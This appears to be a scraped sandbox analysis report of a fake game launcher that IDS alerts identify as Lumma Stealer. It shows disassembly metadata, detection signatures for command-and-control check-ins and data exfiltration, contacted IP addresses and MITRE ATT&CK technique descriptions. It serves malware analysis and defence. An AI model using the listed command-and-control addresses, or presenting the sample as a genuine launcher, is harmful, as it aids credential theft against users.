GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006C6F9B
FreeLibrary.KERNEL32(00000000,?,?,00000000,006D25EB,000000FF,?,006C7015,00000002,?,006C70B1,006C83A0), ref: 006C6FBD

Strings

mscoree.dll, xrefs: 006C6F82
CorExitProcess, xrefs: 006C6F93

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f68bca5a3a6d3b0350017ca2bc67691358ed0fb97b3e326d838e44b78e722d29
Instruction ID: 47784836d93b425e62a517eb87147257a6f46614a4ad79dc271b85372fed93b3
Opcode Fuzzy Hash: f68bca5a3a6d3b0350017ca2bc67691358ed0fb97b3e326d838e44b78e722d29
Instruction Fuzzy Hash: A401A231D04619ABCB119F50DC09FFEB7BAFB44B11F05052AF821E2390DBB49900CAA4

Function 006CDF1D Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 006CDFA2
__alloca_probe_16.LIBCMT ref: 006CE06B
__freea.LIBCMT ref: 006CE0D2

Part of subcall function 006CBC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006C41E0,?,?,006C1007,?,006BFAB5), ref: 006CBC77

__freea.LIBCMT ref: 006CE0E5
__freea.LIBCMT ref: 006CE0F2

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: ad2cadcb5e34d7470090f7134384e3547bb50f317745fdfb547be3aff19b944b
Instruction ID: 5ec2a7679f0c9c95f3de1209857fc49ee70c13bfdbe2d4afd03bf91603220dbb
Opcode Fuzzy Hash: ad2cadcb5e34d7470090f7134384e3547bb50f317745fdfb547be3aff19b944b
Instruction Fuzzy Hash: DC518E72600216ABDB215E60CC82FBB7BBBEF44710B15412DF905D7241EBB2DC60D6E4

Function 006C94F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006C93FE,?,?,00000000,00000000,00000000,?), ref: 006C951D
CatchIt.LIBVCRUNTIME ref: 006C9603

Strings

RCC, xrefs: 006C9537
MOC, xrefs: 006C952F

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 94f5ed7f9dc1cca785f35b6da27f83a4202d520d4b896fa5c032f7b265b18332
Instruction ID: c60f12104fe7a94be784d8d2db2e127b2597c5ddda31190392288286fa28880b
Opcode Fuzzy Hash: 94f5ed7f9dc1cca785f35b6da27f83a4202d520d4b896fa5c032f7b265b18332
Instruction Fuzzy Hash: 96414671900209AFDF16DF98CC89EEEBBB6EF48300F18809DF905A7261D735A950DB64

Function 006CDC5E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006CDCFA,00000000,?,006DCCD0,?,?,?,006CDC31,00000004,InitializeCriticalSectionEx,006D46F8,006D4700), ref: 006CDC6B
GetLastError.KERNEL32(?,006CDCFA,00000000,?,006DCCD0,?,?,?,006CDC31,00000004,InitializeCriticalSectionEx,006D46F8,006D4700,00000000,?,006C971C), ref: 006CDC75
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006CDC9D

Strings

api-ms-, xrefs: 006CDC82

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c02dd402e4c4104220f2607d708bf28a7d62b35eba6c844884019a8fc21244ab
Instruction ID: adac7c337e0de14bb2aed6055ef5dc678a95281b7b673cc09e91cbc923e4962f
Opcode Fuzzy Hash: c02dd402e4c4104220f2607d708bf28a7d62b35eba6c844884019a8fc21244ab
Instruction Fuzzy Hash: CCE04830A40205BFEF102F51DC0AF693B9BEB00B54F144035F90DE81E1EBA2A811C554

Function 006CE5E8 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(C362B542,00000000,00000000,?), ref: 006CE64B

Part of subcall function 006CD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006C87B1,?,00000000,?), ref: 006CD192

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006CE89D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006CE8E3
GetLastError.KERNEL32 ref: 006CE986

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: ce3753fe025de49ed89ee5f4e719a84289a68f0067a216ddbd134a2dea51dc00
Instruction ID: b9eaeb5052b11ec6b6b128ee64dbf7bff8a6590aa9b5de9008ccf90341b65b41
Opcode Fuzzy Hash: ce3753fe025de49ed89ee5f4e719a84289a68f0067a216ddbd134a2dea51dc00
Instruction Fuzzy Hash: C1D17A75D002599FCF15CFA8C880AEDBBBAFF49314F28416EE456EB351D631A942CB60

Function 006C8EFC Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 006C8FC3
___AdjustPointer.LIBCMT ref: 006C8FE6
___AdjustPointer.LIBCMT ref: 006C9082

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 2e598873a3d49aa499a496656f1be3726758436dd031efd21970af0d870e3b25
Instruction ID: 5f1b46276a026795195bcd976e8e8a1fb0fa9f39657c1c7ebce738f2d59d1ced
Opcode Fuzzy Hash: 2e598873a3d49aa499a496656f1be3726758436dd031efd21970af0d870e3b25
Instruction Fuzzy Hash: AA510472605606AFEB399F54C849FBA73A7FF00340F14012DE9158B291EB31EC80CBA4

Function 006CC5B8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 006CD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006C87B1,?,00000000,?), ref: 006CD192

GetLastError.KERNEL32 ref: 006CC61C
__dosmaperr.LIBCMT ref: 006CC623
GetLastError.KERNEL32(?,?,?,?), ref: 006CC65D
__dosmaperr.LIBCMT ref: 006CC664

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 6d2c2e21666acfde815e28b665dbe16f28b78a36f07e2bf6dbeecd79bb6ab153
Instruction ID: 8a26ac90d07e1153e7be0d235d146a9a349f30ec45738455e87807405ef9b588
Opcode Fuzzy Hash: 6d2c2e21666acfde815e28b665dbe16f28b78a36f07e2bf6dbeecd79bb6ab153
Instruction Fuzzy Hash: 6521D071600205AFCB20AF628981F7AB7ABEF44374B10942DF82DD3211D730EC419BA4

Function 006CD22D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006CD235

Part of subcall function 006CD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,006C87B1,?,00000000,?), ref: 006CD192

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006CD26D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006CD28D

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 68a0fc9cbbd551d911fcd3dfe37007f07fec7f0d80b13647d7294fcf207f61d4
Instruction ID: 80318bc96ed31820a51824bf0d97c1fa91b07f98c0a7fa8066c1ca37d906cc80
Opcode Fuzzy Hash: 68a0fc9cbbd551d911fcd3dfe37007f07fec7f0d80b13647d7294fcf207f61d4
Instruction Fuzzy Hash: 7F11DBF1A015197E671137B19C8AEBF6A9FDE953A4B10003DF902D2102FB64CE024575

Function 006D07C0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000), ref: 006D07D7
GetLastError.KERNEL32(?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000,?,?,?,006CE320,00000000), ref: 006D07E3

Part of subcall function 006D0840: CloseHandle.KERNEL32(FFFFFFFE,006D07F3,?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000,?,?), ref: 006D0850

___initconout.LIBCMT ref: 006D07F3

Part of subcall function 006D0815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006D07B1,006CFF1E,?,?,006CE9DA,?,00000000,00000000,?), ref: 006D0828

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,006CFF31,00000000,00000001,00000000,?,?,006CE9DA,?,00000000,00000000,?), ref: 006D0808

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 1045f24c5f01b930da20fbc8911c779f7dec39363ddab3f862903a8fb708bee8
Instruction ID: 7bbe33d81ce6215e81d909e49220c0a741b520b53b8d35a5bad8327bad738d5e
Opcode Fuzzy Hash: 1045f24c5f01b930da20fbc8911c779f7dec39363ddab3f862903a8fb708bee8
Instruction Fuzzy Hash: 11F01236801158BBCF222F91DC04ACD3F67FF483A1F019416FA1885221C672C820ABD1

Function 006C8D6C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 006C8D75

Strings

csm, xrefs: 006C8E08
csm, xrefs: 006C8D97

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 59c510e0acd76fad2d83b69b5c184c2966916990ae5a207c822b7e8c2bcb4555
Instruction ID: 1d924bc5061ba562363c580452f82ea986becf904ae0b3c5f143bd85da768147
Opcode Fuzzy Hash: 59c510e0acd76fad2d83b69b5c184c2966916990ae5a207c822b7e8c2bcb4555
Instruction Fuzzy Hash: FB31AE76410259EFCF329F50C844EBA7B67EF48314B18865EF9445A221CB32ED61DB81

Function 006C45A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006C4533: __EH_prolog3_GS.LIBCMT ref: 006C453A

std::domain_error::domain_error.LIBCPMT ref: 006C45EC

Part of subcall function 006C43A4: std::exception::exception.LIBCONCRT ref: 006C43BA

Strings

CDl, xrefs: 006C45D7
CDl, xrefs: 006C45B6, 006C45C9

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
String ID: CDl$CDl
API String ID: 2144476180-2887887983
Opcode ID: e9f131062be16f64818568312050a79b72a2c540823f88221c5b505092b5d6c2
Instruction ID: 81a531936c30b853915b96277e3da26ccb83be8861cabc1aea0c4fc1702da980
Opcode Fuzzy Hash: e9f131062be16f64818568312050a79b72a2c540823f88221c5b505092b5d6c2
Instruction Fuzzy Hash: 4F011EB0D00218ABCF18EF69D8559AEBBFAFF48704B50852EE41597341DB74DA05CBD4

Analysis Process: Call 0f Duty A1 Launcher.exePID: 7328, Parent PID: 7272COMMON

Non-executed Functions

Function 0355ECBF Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

__common_dcos_data.LIBCMT ref: 0355ED7F
__common_dcos_data.LIBCMT ref: 0355ED87
__common_dcos_data.LIBCMT ref: 0355ED99
__common_dcos_data.LIBCMT ref: 0355EDA6

Memory Dump Source

Source File: 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Offset: 03543000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_3543000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: __common_dcos_data
String ID:
API String ID: 1949606188-0
Opcode ID: 16ed9ee01572862e038c6c1d3797bd00a384460dcb525a4e2d12ef068b478fcf
Instruction ID: 95e54f3bca324e3da9c5b199a49ecb0dea5e48312d40ea180fd42336782aa742
Opcode Fuzzy Hash: 16ed9ee01572862e038c6c1d3797bd00a384460dcb525a4e2d12ef068b478fcf
Instruction Fuzzy Hash: 7D31C876A00310AFD724DF68D8A1A5AB3B5FF85714F5A046DE905DF360D730BA01C780

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 104.21.33.116:443

Source: Joe Sandbox View	IP Address: 104.21.33.116 104.21.33.116
Source: Joe Sandbox View	IP Address: 147.45.47.81 147.45.47.81

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.33.116:443

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

